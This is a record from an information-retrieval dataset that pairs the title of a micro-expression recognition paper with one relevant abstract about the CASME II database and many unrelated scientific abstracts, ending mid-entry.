bc021196c2f478256d62607529102dec | Micro-Expression Recognition Using Robust Principal Component Analysis and Local Spatiotemporal Directional Features | [
{
"docid": "1451c145b1ed5586755a2c89517a582f",
"text": "A robust automatic micro-expression recognition system would have broad applications in national safety, police interrogation, and clinical diagnosis. Developing such a system requires high quality databases with sufficient training samples which are currently not available. We reviewed the previously developed micro-expression databases and built an improved one (CASME II), with higher temporal resolution (200 fps) and spatial resolution (about 280×340 pixels on facial area). We elicited participants' facial expressions in a well-controlled laboratory environment and proper illumination (such as removing light flickering). Among nearly 3000 facial movements, 247 micro-expressions were selected for the database with action units (AUs) and emotions labeled. For baseline evaluation, LBP-TOP and SVM were employed respectively for feature extraction and classifier with the leave-one-subject-out cross-validation method. The best performance is 63.41% for 5-class classification.",
"title": ""
}
] | [
{
"docid": "c97ffa009af202f324a57b0a06ab1900",
"text": "Decades of research and more than 20 randomized controlled trials show that Virtual Reality exposure therapy (VRET) is effective in reducing fear and anxiety. Unfortunately, few providers or patients have had access to the costly and technical equipment previously required. Recent technological advances in the form of consumer Virtual Reality (VR) systems (e.g. Oculus Rift and Samsung Gear), however, now make widespread use of VRET in clinical settings and as self-help applications possible. In this literature review, we detail the current state of VR technology and discuss important therapeutic considerations in designing self-help and clinician-led VRETs, such as platform choice, exposure progression design, inhibitory learning strategies, stimuli tailoring, gamification, virtual social learning and more. We illustrate how these therapeutic components can be incorporated and utilized in VRET applications, taking full advantage of the unique capabilities of virtual environments, and showcase some of these features by describing the development of a consumer-ready, gamified self-help VRET application for low-cost commercially available VR hardware. We also raise and discuss challenges in the planning, development, evaluation, and dissemination of VRET applications, including the need for more high-quality research. We conclude by discussing how new technology (e.g. eye-tracking) can be incorporated into future VRETs and how widespread use of VRET self-help applications will enable collection of naturalistic \"Big Data\" that promises to inform learning theory and behavioral therapy in general.",
"title": ""
},
{
"docid": "2fc8918896f02d248597b5950fc33857",
"text": "This paper investigates the design and implementation of a finger-like robotic structure capable of reproducing human hand gestural movements performed by a multi-fingered, hand-like structure. In this work, we present a pneumatic circuit and a closed-loop controller for a finger-like soft pneumatic actuator. Experimental results demonstrate the performance of the pneumatic and control systems of the soft pneumatic actuator, and its ability to track human movement trajectories with affective content.",
"title": ""
},
{
"docid": "ca865ac35d84f0f3c4a4dec15f6c6916",
"text": "As information and communicatio n technologies become a critical component of firms’ infrastructure s and information establishe s itself as a key business resource as well asdriver,peoplestart torealisethat there is more than the functionalit y of the new information systemsthat is significant. Business or organisational transactions over new media require stability , one factor of which is information security. Information systems development practices have changed in line with the evolution of technology offerings as well as the nature of systems developed. Nevertheless , as this paper establishes , most contemporary development practices do not accommodate sufficientl y security concerns. Beyond the literature evidence, reports on empirical study results indicating that practitioners deal with security issuesbyapplyingconventional risk analysis practices after the system is developed. Addresses the lack of a defined discipline for security concerns integration in systems development by using field study results recording development practicesthatarecurrently inuseto illustratetheir deficiencies ,to point to required enhancements of practice and to propose a list of desired features that contemporary development practices should incorporate to address security concerns. This work has been supported in part by the Ministry of Development, Hellenic Secretariat for Research and Development, through programme YPER97. standards such as the Capability Maturity Model (CMM), could strengthen the initiatives of organisations for IS assurance and security. Quality certification is not directly linked to security aspects, but there are strong relating requirements for: duty separation, job descriptions and document control; and validity and availability of documentation and forms. Fillery and Chantler (1994) view this as a problematic situation and argue that lack of quality procedures and assurance in IT production is the heart of the problem and dealing with this issue is essential for embedding worthy security features in them. Information security problems in contemporary product/component-oriented development practices could be resolved in the context of quality assurance, since each single product could be validated and assured properly. The validation of products along with process assurance is the heart of the holistic proposal from Eloff and Von Solms (2000), which exploits this trend and combines both system components and system processes. The previous proposals address the importance of information security in the modern world and the need to be integrated in systems development, but still, they do not refer explicitly to the changes that need to be introduced in development practices, actors and scenarios. Furthermore, assurance of high-quality development cannot by itself ensure security, as even the perfect product could be subject of misuse. Thus, this paper sets off to address the following questions: 1 What do practitioners and developers do when they face requirements for secure systems development, how do they integrate security concerns to their development processes? And in particular: Do they, and if so how do they, implement security solutions early in the development processes? How do the implemented solutions get integrated to the overall organisational structure and everyday life of a particular organisational environment? 2 What perceptions of security do the involved IS stakeholders have? 
What implications do those perceptions have in the development of secure systems? Information security is a field combining technical aspects as well as social, cultural and legal/regulatory concerns. Most of the attempts to resolve security problems are focused largely upon the technological component, ignoring important contextual `̀ soft’’ parameters, enlarging in this way the gap between real world’s requirements for secure systems and the means to achieve it. Development approaches In the past the information systems’ boundaries within the organisation were quite clear and limited. As business process support tools their essence and structure were stable, confined first to automation of basic transaction processing, to explode then in a multiplicity of forms of management support tools. The basic tenets of systems development theory and practice were that systems could be produced in a specific and (in theory) standardised way, proceeding linearly through well defined stages, including a substantial programming effort, intersected by inspection and feedback milestones. The systems engineering paradigm is encapsulated in most methodologies available (Avison and Fitzgerald, 1993). Nevertheless, the `̀ profile’’ of systems development approaches has undergone fundamental changes along with the evolution of technology, as well as the nature of systems found in today’s enterprises. In essence, the traditional approach, based on the life cycle concept for a systems project, cannot capture the extensive use of commercially available application platforms as a basis for new systems development. Moreover, the vast variety of commercially available software products that can be combined to reach the required functionality for a particular system makes component-based development a realistic option. In all, systems development `̀ from scratch’’ is far less practiced compared to ten years ago. The information systems literature, in which the methodologies movement flourished in the 1980s and early 1990s, has not addressed sufficiently the new norms of practice. In this paper, we introduce a rudimentary classification of contemporary systems development practices along the well-known `̀ make or buy’’ divide. Most systems projects are now anchored on the `̀ buy’’ maxim; there we introduce two development approaches, namely single product based and componentbased development. On the `̀ make’’ side we have proprietary development. We argue that each of these three approaches introduces different challenges to developers regarding security concerns. When the IS department could not allocate the requested human resources, or its [ 184] T. Tryfonas, E. Kiountouzis and A. Poulymenakou Embedding security practices in contemporary information systems development approaches Information Management & Computer Security 9/4 [2001] 183±197 resources did not qualify in terms of experience and know-how for a specific development project, a ready-made system could have been purchased. At such times a system could be considered an accounting package and the computer in which this resided. Therefore the scope of a ready-made solution could vary from a single package to a comprehensive IS. In the case that more than one application was chosen and eventually operating, it was practically very difficult to integrate them so as to produce a unified and comprehensive organisational information management solution. 
The composition of the technical infrastructure was made from ready packages in whose operational philosophy should the organisation fit-in. This is a major contradiction to in-house development of a solution, which leads to systems tailored to a particular organisation’s needs and character. But contemporary development practices managed to soft-pedal this contradiction. Single-product based (or configuration) development The evolution of the technological infrastructure, the knowledge that evolved about systems development and results from the successful, or not, application of a number of ready-made systems, led to the creation and institution of basic parts of technology solutions (core systems), that, deployed with a proper configuration, could fit-in to any organisational environment (Fitzgerald, 1998). This practice, termed as single-product based development or configuration development, has led to the development of information technologies that implement a core functionality of an organisation and are customisable (can be properly configured) depending on the environment. Examples of such systems are the enterprise resource planning (ERP) systems such as the SAP, BAAN and PeopleSoft product suites. Single-product systems enable the standardisation of business processes and also facilitate the difficult task of communication of horizontal applications within a vertical sector (Vasarhelyi and Kogan, 1999). Component-based development Market requirements for successful and on-time delivered systems that can face the rapid changing contemporary business and social reality led to a second popular practice of developing systems, the component-based development. Development efforts are allocated to relatively independent sectors/ sub-systems of a manageable size that could possibly be implemented by different and topologically distributed teams. Monolithic systems are abandoned as they fail to meet the needs of modern business processes and to be delivered on time. By following this practice, one can schedule earlier the delivery of the critical system’s components and in general, all components can be arranged and scheduled to be delivered in terms of their priority (Clements, 1995). In addition, basic user requirements can be met from the beginning of the development effort, so that an organisation could take advantage of the system before this is fully implemented and deployed. This principle empowers rapid application development (RAD) practices that substitute monolithic application development with modularised, componentbased systems, the components of which have been properly evaluated by the system’s endusers and domain experts. There is a general impression that the conventional linear lifecycle of monolithic systems cannot contribute anymore to the development of successful systems and their on-time delivery (Howard et al., 1999). Proprietary development Organisations’ informational needs were defined in the past by the relatively small requirements for automation of their processes. The main objective was compute",
"title": ""
},
{
"docid": "a9dfddc3812be19de67fc4ffbc2cad77",
"text": "Many real-world problems, such as network packet routing and the coordination of autonomous vehicles, are naturally modelled as cooperative multi-agent systems. There is a great need for new reinforcement learning methods that can efficiently learn decentralised policies for such systems. To this end, we propose a new multi-agent actor-critic method called counterfactual multi-agent (COMA) policy gradients. COMA uses a centralised critic to estimate the Q-function and decentralised actors to optimise the agents’ policies. In addition, to address the challenges of multi-agent credit assignment, it uses a counterfactual baseline that marginalises out a single agent’s action, while keeping the other agents’ actions fixed. COMA also uses a critic representation that allows the counterfactual baseline to be computed efficiently in a single forward pass. We evaluate COMA in the testbed of StarCraft unit micromanagement, using a decentralised variant with significant partial observability. COMA significantly improves average performance over other multi-agent actorcritic methods in this setting, and the best performing agents are competitive with state-of-the-art centralised controllers that get access to the full state.",
"title": ""
},
{
"docid": "edeb56280e9645133b8ffbf40bcd9287",
"text": "The design, architecture and VLSI implementation of an image compression algorithm for high-frame rate, multi-view wireless endoscopy is presented. By operating directly on Bayer color filter array image the algorithm achieves both high overall energy efficiency and low implementation cost. It uses two-dimensional discrete cosine transform to decorrelate image values in each $$4\\times 4$$ 4 × 4 block. Resulting coefficients are encoded by a new low-complexity yet efficient entropy encoder. An adaptive deblocking filter on the decoder side removes blocking effects and tiling artifacts on very flat image, which enhance the final image quality. The proposed compressor, including a 4 KB FIFO, a parallel to serial converter and a forward error correction encoder, is implemented in 180 nm CMOS process. It consumes 1.32 mW at 50 frames per second (fps) and only 0.68 mW at 25 fps at 3 MHz clock. Low silicon area 1.1 mm $$\\times$$ × 1.1 mm, high energy efficiency (27 $$\\upmu$$ μ J/frame) and throughput offer excellent scalability to handle image processing tasks in new, emerging, multi-view, robotic capsules.",
"title": ""
},
{
"docid": "2a509254ce4f91646645b3eb0b745d3d",
"text": "According to attention restoration theory, directed attention can become fatigued and then be restored by spending time in a restorative environment. This study examined the restorative effects of nature on children’s executive functioning. Sevento 8-year-olds (school aged, n = 34) and 4to 5-year-olds (preschool, n = 33) participated in two sessions in which they completed an activity to fatigue attention, then walked along urban streets (urban walk) in one session and in a park-like area (nature walk) in another session, and finally completed assessments of working memory, inhibitory control, and attention. Children responded faster on the attention task after a nature walk than an urban walk. School-aged children performed significantly better on the attention task than preschoolers following the nature walk, but not urban walk. Walk type did not affect inhibitory control or verbal working memory. However, preschoolers’ spatial working memory remained more stable following the nature walk than the urban walk.",
"title": ""
},
{
"docid": "ab66d7e267072432d1015e36260c9866",
"text": "Deep Neural Networks (DNNs) are the current state of the art for various tasks such as object detection, natural language processing and semantic segmentation. These networks are massively parallel, hierarchical models with each level of hierarchy performing millions of operations on a single input. The enormous amount of parallel computation makes these DNNs suitable for custom acceleration. Custom accelerators can provide real time inference of DNNs at low power thus enabling widespread embedded deployment. In this paper, we present Snowflake, a high efficiency, low power accelerator for DNNs. Snowflake was designed to achieve optimum occupancy at low bandwidths and it is agnostic to the network architecture. Snowflake was implemented on the Xilinx Zynq XC7Z045 APSoC and achieves a peak performance of 128 G-ops/s. Snowflake is able to maintain a throughput of 98 FPS on AlexNet while averaging 1.2 GB/s of memory bandwidth.",
"title": ""
},
{
"docid": "a4a5c6b94d5b377d13b521e3dbbf0d16",
"text": "We present a large-scale dataset, ReCoRD, for machine reading comprehension requiring commonsense reasoning. Experiments on this dataset demonstrate that the performance of state-of-the-art MRC systems fall far behind human performance. ReCoRD represents a challenge for future research to bridge the gap between human and machine commonsense reading comprehension. ReCoRD is available at http://nlp.jhu.edu/record.",
"title": ""
},
{
"docid": "5f31121bf6b8412a84f8aa46763c4d40",
"text": "A novel Koch-like fractal curve is proposed to transform ultra-wideband (UWB) bow-tie into so called Koch-like sided fractal bow-tie dipole. A small isosceles triangle is cut off from center of each side of the initial isosceles triangle, then the procedure iterates along the sides like Koch curve does, forming the Koch-like fractal bow-tie geometry. The fractal bow-tie of each iterative is investigated without feedline in free space for fractal trait unveiling first, followed by detailed expansion upon the four-iterated pragmatic fractal bow-tie dipole fed by 50-Ω coaxial SMA connector through coplanar stripline (CPS) and comparison with Sierpinski gasket. The fractal bow-tie dipole can operate in multiband with moderate gain (3.5-7 dBi) and high efficiency (60%-80%), which is corresponding to certain shape parameters, such as notch ratio α, notch angle φ, and base angles θ of the isosceles triangle. Compared with conventional bow-tie dipole and Sierpinski gasket with the same size, this fractal-like antenna has almost the same operating properties in low frequency and better radiation pattern in high frequency in multi-band operation, which makes it a better candidate for applications of PCS, WLAN, WiFi, WiMAX, and other communication systems.",
"title": ""
},
{
"docid": "775cf5c9e160d8975b1652d404c590e0",
"text": "PURPOSE OF REVIEW\nWe provide an overview of the neurological condition known as visual snow syndrome. Patients affected by this chronic disorder suffer with a pan-field visual disturbance described as tiny flickering dots, which resemble the static noise of an untuned television.\n\n\nRECENT FINDINGS\nThe term 'visual snow' has only appeared in the medical literature very recently. The clinical features of the syndrome have now been reasonably described and the pathophysiology has begun to be explored. This review focuses on what is currently known about visual snow.\n\n\nSUMMARY\nRecent evidence suggests visual snow is a complex neurological syndrome characterized by debilitating visual symptoms. It is becoming better understood as it is systematically studied. Perhaps the most important unmet need for the condition is a sufficient understanding of it to generate and test hypotheses about treatment.",
"title": ""
},
{
"docid": "5b50e84437dc27f5b38b53d8613ae2c7",
"text": "We present a practical vision-based robotic bin-picking sy stem that performs detection and 3D pose estimation of objects in an unstr ctu ed bin using a novel camera design, picks up parts from the bin, and p erforms error detection and pose correction while the part is in the gri pper. Two main innovations enable our system to achieve real-time robust a nd accurate operation. First, we use a multi-flash camera that extracts rob ust depth edges. Second, we introduce an efficient shape-matching algorithm called fast directional chamfer matching (FDCM), which is used to reliabl y detect objects and estimate their poses. FDCM improves the accuracy of cham fer atching by including edge orientation. It also achieves massive improvements in matching speed using line-segment approximations of edges , a 3D distance transform, and directional integral images. We empiricall y show that these speedups, combined with the use of bounds in the spatial and h ypothesis domains, give the algorithm sublinear computational compl exity. We also apply our FDCM method to other applications in the context of deformable and articulated shape matching. In addition to significantl y improving upon the accuracy of previous chamfer matching methods in all of t he evaluated applications, FDCM is up to two orders of magnitude faster th an the previous methods.",
"title": ""
},
{
"docid": "fb15647d528df8b8613376066d9f5e68",
"text": "This article described the feature extraction methods of crop disease based on computer image processing technology in detail. Based on color, texture and shape feature extraction method in three aspects features and their respective problems were introduced start from the perspective of lesion leaves. Application research of image feature extraction in the filed of crop disease was reviewed in recent years. The results were analyzed that about feature extraction methods, and then the application of image feature extraction techniques in the future detection of crop diseases in the field of intelligent was prospected.",
"title": ""
},
{
"docid": "7346ce53235490f0eaf1ad97c7c23006",
"text": "With the growth in sociality and interaction around online news media, news sites are increasingly becoming places for communities to discuss and address common issues spurred by news articles. The quality of online news comments is of importance to news organizations that want to provide a valuable exchange of community ideas and maintain credibility within the community. In this work we examine the complex interplay between the needs and desires of news commenters with the functioning of different journalistic approaches toward managing comment quality. Drawing primarily on newsroom interviews and reader surveys, we characterize the comment discourse of SacBee.com, discuss the relationship of comment quality to both the consumption and production of news information, and provide a description of both readers' and writers' motivations for usage of news comments. We also examine newsroom strategies for dealing with comment quality as well as explore tensions and opportunities for value-sensitive innovation within such online communities.",
"title": ""
},
{
"docid": "76d1509549ba64157911e6b723f6ebc5",
"text": "A single-stage soft-switching converter is proposed for universal line voltage applications. A boost type of active-clamp circuit is used to achieve zero-voltage switching operation of the power switches. A simple DC-link voltage feedback scheme is applied to the proposed converter. A resonant voltage-doubler rectifier helps the output diodes to achieve zero-current switching operation. The reverse-recovery losses of the output diodes can be eliminated without any additional components. The DC-link capacitor voltage can be reduced, providing reduced voltage stresses of switching devices. Furthermore, power conversion efficiency can be improved by the soft-switching operation of switching devices. The performance of the proposed converter is evaluated on a 160-W (50 V/3.2 A) experimental prototype. The proposed converter complies with International Electrotechnical Commission (IEC) 1000-3-2 Class-D requirements for the light-emitting diode power supply of large-sized liquid crystal displays, maintaining the DC-link capacitor voltage within 400 V under the universal line voltage (90-265 Vrms).",
"title": ""
},
{
"docid": "3663d877d157c8ba589e4d699afc460f",
"text": "Studies of search habits reveal that people engage in many search tasks involving collaboration with others, such as travel planning, organizing social events, or working on a homework assignment. However, current Web search tools are designed for a single user, working alone. We introduce SearchTogether, a prototype that enables groups of remote users to synchronously or asynchronously collaborate when searching the Web. We describe an example usage scenario, and discuss the ways SearchTogether facilitates collaboration by supporting awareness, division of labor, and persistence. We then discuss the findings of our evaluation of SearchTogether, analyzing which aspects of its design enabled successful collaboration among study participants.",
"title": ""
},
{
"docid": "e4c2fc7244642b5858950f7c549e381e",
"text": "In this paper, we propose the Broadcasting Convolutional Network (BCN) that extracts key object features from the global field of an entire input image and recognizes their relationship with local features. BCN is a simple network module that collects effective spatial features, embeds location information and broadcasts them to the entire feature maps. We further introduce the Multi-Relational Network (multiRN) that improves the existing Relation Network (RN) by utilizing the BCN module. In pixel-based relation reasoning problems, with the help of BCN, multiRN extends the concept of ‘pairwise relations’ in conventional RNs to ‘multiwise relations’ by relating each object with multiple objects at once. This yields in O(n) complexity for n objects, which is a vast computational gain from RNs that take O(n). Through experiments, multiRN has achieved a state-of-the-art performance on CLEVR dataset, which proves the usability of BCN on relation reasoning problems.",
"title": ""
},
{
"docid": "3e113df3164468bd67060822de9a647c",
"text": "BACKGROUND\nPrevious estimates of the prevalence of geriatric depression have varied. There are few large population-based studies; most of these focused on individuals younger than 80 years. No US studies have been published since the advent of the newer antidepressant agents.\n\n\nMETHODS\nIn 1995 through 1996, as part of a large population study, we examined the current and lifetime prevalence of depressive disorders in 4,559 nondemented individuals aged 65 to 100 years. This sample represented 90% of the elderly population of Cache County, Utah. Using a modified version of the Diagnostic Interview Schedule, we ascertained past and present DSM-IV major depression, dysthymia, and subclinical depressive disorders. Medication use was determined through a structured interview and a \"medicine chest inventory.\"\n\n\nRESULTS\nPoint prevalence of major depression was estimated at 4.4% in women and 2.7% in men (P= .003). Other depressive syndromes were surprisingly uncommon (combined point prevalence, 1.6%). Among subjects with current major depression, 35.7% were taking an antidepressant (mostly selective serotonin reuptake inhibitors) and 27.4% a sedative/hypnotic. The current prevalence of major depression did not change appreciably with age. Estimated lifetime prevalence of major depression was 20.4% in women and 9.6% in men (P<.001), decreasing with age.\n\n\nCONCLUSIONS\nThese estimates for prevalence of major depression are higher than those reported previously in North American studies. Treatment with antidepressants was more common than reported previously, but was still lacking in most individuals with major depression. The prevalence of subsyndromal depressive symptoms was low, possibly because of unusual characteristics of the population.",
"title": ""
},
{
"docid": "102a97a997d0fb7f2d013434a9468e38",
"text": "Avocado plant (Persea americana), a plant belonging to the family of Lauraceae and genus, persea bears fruit known as avocado pear or alligator pear that contains the avocado pear seed. Reported uses of avocado pear seed include use in the management of hypertension, diabetes, cancer and inflammation [7-9]. The fruit is known as ube oyibo (loosely translated to ‘foreign pear’) in Ojoto and neighboring Igbo speaking communities south east Nigeria [10]. Different parts of avocado pear were used in traditional medications for various purposes including as an antimicrobial [11,12]. That not withstanding, the avocado pear seeds are essentially discarded as agro-food wastes hence underutilized. Exploring the possible dietary and therapeutic potentials of especially underutilized agro-food wastes will in addition reduce the possible environmental waste burden [1315]. Thus, this study was warranted and aimed at assessing the proximate, functional, anti-nutrients and antimicrobial properties of avocado pear seed to provide basis for its possible dietary use and justification for its ethno-medicinal use. The objectives set to achieving the study aim as stated were by determining the proximate, functional, antinutrient and antimicrobial properties of avocado pear (Persea americana) seeds using standard methods as in the study design.",
"title": ""
},
{
"docid": "87e8b5b75b5e83ebc52579e8bbae04f0",
"text": "A differential CMOS Logic family that is well suited to automated logic minimization and placement and routing techniques, yet has comparable performance to conventional CMOS, will be described. A CMOS circuit using 10,880 NMOS differential pairs has been developed using this approach.",
"title": ""
},
{
"docid": "43233ce6805a50ed931ce319245e4f6b",
"text": "Currently the use of three-phase induction machines is widespread in industrial applications due to several methods available to control the speed and torque of the motor. Many applications require that the same torque be available at all revolutions up to the nominal value. In this paper two control methods are compared: scalar control and vector control. Scalar control is a relatively simple method. The purpose of the technique is to control the magnitude of the chosen control quantities. At the induction motor the technique is used as Volts/Hertz constant control. Vector control is a more complex control technique, the evolution of which was inevitable, too, since scalar control cannot be applied for controlling systems with dynamic behaviour. The vector control technique works with vector quantities, controlling the desired values by using space phasors which contain all the three phase quantities in one phasor. It is also known as field-oriented control because in the course of implementation the identification of the field flux of the motor is required. This paper reports on the changing possibilities of the revolution – torque characteristic curve, and demonstrates the results of the two control methods with simulations. The simulations and the applied equivalent circuit parameters are based on real measurements done with no load, with direct current and with locked-rotor.",
"title": ""
}
] | scidocsrr |
7f703779ffed9562ef7af9b03fe8281a | Data Analytics for Location-Based Services: Enabling User-Based Relocation of Carsharing Vehicles | [
{
"docid": "d7eb5cc1277ed68c88a4d8222a99ccfd",
"text": "Bike-sharing systems allow people to rent a bicycle at one of many automatic rental stations scattered around the city, use them for a short journey and return them at any station in the city. A crucial factor for the success of a bikesharing system is its ability to meet the fluctuating demand for bicycles and for vacant lockers at each station. This is achieved by means of a repositioning operation, which consists of removing bicycles from some stations and transferring them to other stations, using a dedicated fleet of trucks. Operating such a fleet in a large bike-sharing system is an intricate problem consisting of decisions regarding the routes that the vehicles should follow and the number of bicycles that should be removed or placed at each station on each visit of the vehicles. In this paper, we present our modeling approach to the problem that generalizes existing routing models in the literature. This is done by introducing a unique convex objective function as well as time-related considerations. We present two mixed integer linear program formulations, discuss the assumptions associated with each, strengthen them by several valid inequalities and dominance rules, and compare their performances through an extensive numerical study. The results indicate that one of the formulations is very effective in obtaining high quality solutions to real life instances of the problem consisting of up to 104 stations and two vehicles. Finally, we draw insights on the characteristics of good solutions. T. Raviv (&) M. Tzur I. A. Forma Industrial Engineering Department, Tel Aviv University, 69978 Tel Aviv, Israel e-mail: talraviv@eng.tau.ac.il M. Tzur e-mail: tzur@eng.tau.ac.il I. A. Forma e-mail: irisforma@eng.tau.ac.il; Irisf@afeka.ac.il I. A. Forma Afeka Tel Aviv Academic College of Engineering, Bnei Efraim 218, Tel Aviv, Israel 123 EURO J Transp Logist DOI 10.1007/s13676-012-0017-6",
"title": ""
}
] | [
{
"docid": "6daa93f2a7cfaaa047ecdc04fb802479",
"text": "Facial landmark localization is important to many facial recognition and analysis tasks, such as face attributes analysis, head pose estimation, 3D face modelling, and facial expression analysis. In this paper, we propose a new approach to localizing landmarks in facial image by deep convolutional neural network (DCNN). We make two enhancements on the CNN to adapt it to the feature localization task as follows. Firstly, we replace the commonly used max pooling by depth-wise convolution to obtain better localization performance. Secondly, we define a response map for each facial points as a 2D probability map indicating the presence likelihood, and train our model with a KL divergence loss. To obtain robust localization results, our approach first takes the expectations of the response maps of Enhanced CNN and then applies auto-encoder model to the global shape vector, which is effective to rectify the outlier points by the prior global landmark configurations. The proposed ECNN method achieves 5.32% mean error on the experiments on the 300-W dataset, which is comparable to the state-of-the-art performance on this standard benchmark, showing the effectiveness of our methods.",
"title": ""
},
{
"docid": "4129881d5ff6f510f6deb23fd5b29afa",
"text": "Childbirth is an intricate process which is marked by an increased cervical dilation rate caused due to steady increments in the frequency and strength of uterine contractions. The contractions may be characterized by its strength, duration and frequency (count) - which are monitored through Tocography. However, the procedure is prone to subjectivity and an automated approach for the classification of the contractions is needed. In this paper, we use three different Weighted K-Nearest Neighbor classifiers and Decision Trees to classify the contractions into three types: Mild, Moderate and Strong. Further, we note the fact that our training data consists of fewer samples of Contractions as compared to those of Non-contractions - resulting in “Class Imbalance”. Hence, we use the Synthetic Minority Oversampling Technique (SMOTE) in conjunction with the K-NN classifier and Decision Trees to alleviate the problems of the same. The ground truth for Tocography signals was established by a doctor having an experience of 36 years in Obstetrics and Gynaecology. The annotations are in three categories: Mild (33 samples), Moderate (64 samples) and Strong (96 samples), amounting to a total of 193 contractions whereas the number of Non-contraction samples was 1217. Decision Trees using SMOTE performed the best with accuracies of 95%, 98.25% and 100% for the aforementioned categories, respectively. The sensitivities achieved for the same are 96.67%, 96.52% and 100% whereas the specificities amount to 93.33%, 100% and 100%, respectively. Our method may be used to monitor the labour progress efficiently.",
"title": ""
},
{
"docid": "3a066516f52dec6150fcf4a8e081605f",
"text": "Writer: Julie Risbourg Title: Breaking the ‘glass ceiling’ Subtitle: Language: A Critical Discourse Analysis of how powerful businesswomen are portrayed in The Economist online English Pages: 52 Women still represent a minority in the executive world. Much research has been aimed at finding possible explanations concerning the underrepresentation of women in the male dominated executive sphere. The findings commonly suggest that a patriarchal society and the maintenance of gender stereotypes lead to inequalities and become obstacles for women to break the so-called ‘glass ceiling’. This thesis, however, aims to explore how businesswomen are represented once they have broken the glass ceiling and entered the executive world. Within the Forbes’ list of the 100 most powerful women of 2017, the two first businesswomen on the list were chosen, and their portrayals were analysed through articles published by The Economist online. The theoretical framework of this thesis includes Goffman’s framing theory and takes a cultural feminist perspective on exploring how the media outlet frames businesswomen Sheryl Sandberg and Mary Barra. The thesis also examines how these frames relate to the concepts of stereotyping, commonly used in the coverage of women in the media. More specifically, the study investigates whether negative stereotypes concerning their gender are present in the texts or if positive stereotypes such as idealisation are used to portray them. Those concepts are coupled with the theoretical aspect of the method, which is Critical Discourse Analysis. This method is chosen in order to explore the underlying meanings and messages The Economist chose to refer to these two businesswomen. This is done through the use of linguistic and visual tools, such as lexical choices, word connotations, nomination/functionalisation and gaze. The findings show that they were portrayed positively within a professional environment, and the publication celebrated their success and hard work. Moreover, the results also show that gender related traits were mentioned, showing a subjective representation, which is countered by their idealisation, via their presence in not only the executive world, but also having such high-working titles in male dominated industries.",
"title": ""
},
{
"docid": "0e002aae88332f8143e6f3a19c4c578b",
"text": "While attachment research has demonstrated that parents' internal working models of attachment relationships tend to be transmitted to their children, affecting children's developmental trajectories, this study specifically examines associations between adult attachment status and observable parent, child, and dyadic behaviors among children with autism and associated neurodevelopmental disorders of relating and communicating. The Adult Attachment Interview (AAI) was employed to derive parental working models of attachment relationships. The Functional Emotional Assessment Scale (FEAS) was used to determine the quality of relational and functional behaviors in parents and their children. The sample included parents and their 4- to 16-year-old children with autism and associated neurodevelopmental disorders. Hypothesized relationships between AAI classifications and FEAS scores were supported. Significant correlations were found between AAI classification and FEAS scores, indicating that children with autism spectrum disorders whose parents demonstrated secure attachment representations were better able to initiate and respond in two-way pre-symbolic gestural communication; organize two-way social problem-solving communication; and engage in imaginative thinking, symbolic play, and verbal communication. These findings lend support to the relevance of the parent's state of mind pertaining to attachment status to child and parent relational behavior in cases wherein the child has been diagnosed with autism or an associated neurodevelopmental disorder of relating and communicating. A model emerges from these findings of conceptualizing relationships between parental internal models of attachment relationships and parent-child relational and functional levels that may aid in differentiating interventions.",
"title": ""
},
{
"docid": "a23aa9d2a0a100e805e3c25399f4f361",
"text": "Cases of poisoning by oleander (Nerium oleander) were observed in several species, except in goats. This study aimed to evaluate the pathological effects of oleander in goats. The experimental design used three goats per group: the control group, which did not receive oleander and the experimental group, which received leaves of oleander (50 mg/kg/day) for six consecutive days. On the seventh day, goats received 110 mg/kg of oleander leaves four times at one-hourly interval. A last dose of 330 mg/kg of oleander leaves was given subsequently. After the last dose was administered, clinical signs such as apathy, colic, vocalizations, hyperpnea, polyuria, and moderate rumen distention were observed. Electrocardiogram revealed second-degree atrioventricular block. Death occurred on an average at 92 min after the last dosing. Microscopic evaluation revealed renal necrosis at convoluted and collector tubules and slight myocardial degeneration was observed by unequal staining of cardiomyocytes. Data suggest that goats appear to respond to oleander poisoning in a manner similar to other species.",
"title": ""
},
{
"docid": "58eebe0e55f038fea268b6a7a6960939",
"text": "The classic answer to what makes a decision good concerns outcomes. A good decision has high outcome benefits (it is worthwhile) and low outcome costs (it is worth it). I propose that, independent of outcomes or value from worth, people experience a regulatory fit when they use goal pursuit means that fit their regulatory orientation, and this regulatory fit increases the value of what they are doing. The following postulates of this value from fit proposal are examined: (a) People will be more inclined toward goal means that have higher regulatory fit, (b) people's motivation during goal pursuit will be stronger when regulatory fit is higher, (c) people's (prospective) feelings about a choice they might make will be more positive for a desirable choice and more negative for an undesirable choice when regulatory fit is higher, (d) people's (retrospective) evaluations of past decisions or goal pursuits will be more positive when regulatory fit was higher, and (e) people will assign higher value to an object that was chosen with higher regulatory fit. Studies testing each of these postulates support the value-from-fit proposal. How value from fit can enhance or diminish the value of goal pursuits and the quality of life itself is discussed.",
"title": ""
},
{
"docid": "66426e6c8623ececcfaa8a27c0d18d12",
"text": "Defining hope as a cognitive set that is composed of a reciprocally derived sense of successful (a) agency (goal-directed determination) and (b) pathways (planning of ways to meet goals), an individual-differences measure is developed. Studies demonstrate acceptable internal consistency and test-retest reliability, and the factor structure identifies the agency and pathways components of the Hope Scale. Convergent and discriminant validity are documented, along with evidence suggesting that Hope Scale scores augmented the prediction of goal-related activities and coping strategies beyond other self-report measures. Construct validational support is provided in regard to predicted goal-setting behaviors; moreover, the hypothesized goal appraisal processes that accompany the various levels of hope are corroborated.",
"title": ""
},
{
"docid": "68ad03bca3696f1163ba1d09ae1115e0",
"text": "Manually labeling datasets with object masks is extremely time consuming. In this work, we follow the idea of Polygon-RNN [4] to produce polygonal annotations of objects interactively using humans-in-the-loop. We introduce several important improvements to the model: 1) we design a new CNN encoder architecture, 2) show how to effectively train the model with Reinforcement Learning, and 3) significantly increase the output resolution using a Graph Neural Network, allowing the model to accurately annotate high-resolution objects in images. Extensive evaluation on the Cityscapes dataset [8] shows that our model, which we refer to as Polygon-RNN++, significantly outperforms the original model in both automatic (10% absolute and 16% relative improvement in mean IoU) and interactive modes (requiring 50% fewer clicks by annotators). We further analyze the cross-domain scenario in which our model is trained on one dataset, and used out of the box on datasets from varying domains. The results show that Polygon-RNN++ exhibits powerful generalization capabilities, achieving significant improvements over existing pixel-wise methods. Using simple online fine-tuning we further achieve a high reduction in annotation time for new datasets, moving a step closer towards an interactive annotation tool to be used in practice.",
"title": ""
},
{
"docid": "a5c67537b72e3cd184b43c0a0e7c96b2",
